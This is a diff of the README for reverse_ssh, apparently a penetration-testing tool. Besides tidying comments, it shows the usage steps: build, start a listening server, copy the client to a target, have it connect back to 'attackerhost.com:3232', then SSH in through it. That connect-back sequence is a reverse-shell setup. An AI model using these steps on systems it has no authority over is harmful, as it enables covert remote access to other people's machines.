NHAS/reverse_ssh/README.md

 make
 cd bin/

+# start the server
 cp ~/.ssh/id_ed25519.pub authorized_keys
 ./server 0.0.0.0:3232

-#copy client to your target
+# copy client to your target then connect to the server
 ./client attackerhost.com:3232

-#connect to the server from your attacker host
+# connect to the server from your attacker host
 ssh localhost -p 3232
 ```